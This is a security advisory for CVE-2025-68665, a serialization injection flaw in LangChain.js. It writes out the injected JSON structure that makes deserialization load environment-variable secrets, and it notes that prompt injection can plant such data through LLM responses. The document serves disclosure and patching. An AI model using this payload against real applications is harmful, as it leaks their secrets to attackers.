CVE-2025-68665: LangChain serialization injection vulnerability enables secret extraction
Attackers who control serialized data can extract environment variable secrets by injecting {"lc": 1, "type": "secret", "id": ["ENV_VAR"]} to load environment variables during deserialization (when secretsFromEnv: true). They can also instantiate classes with controlled parameters by injecting constructor structures to instantiate any class within the provided import maps with attacker-controlled parameters, potentially triggering side effects such as network calls or file operations.
Key severity factors:
- Affects the serialization path—applications trusting their own serialization output are vulnerable
- Enables secret extraction when combined with
secretsFromEnv: true - LLM responses in
additional_kwargscan be controlled via prompt injection
References
- github.com/advisories/GHSA-r399-636x-v7f6
- github.com/langchain-ai/langchainjs
- github.com/langchain-ai/langchainjs/commit/e5063f9c6e9989ea067dfdff39262b9e7b6aba62
- github.com/langchain-ai/langchainjs/releases/tag/%40langchain%2Fcore%401.1.8
- github.com/langchain-ai/langchainjs/releases/tag/langchain%401.2.3
- github.com/langchain-ai/langchainjs/security/advisories/GHSA-r399-636x-v7f6
- nvd.nist.gov/vuln/detail/CVE-2025-68665
Code Behaviors & Features
Detect and mitigate CVE-2025-68665 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →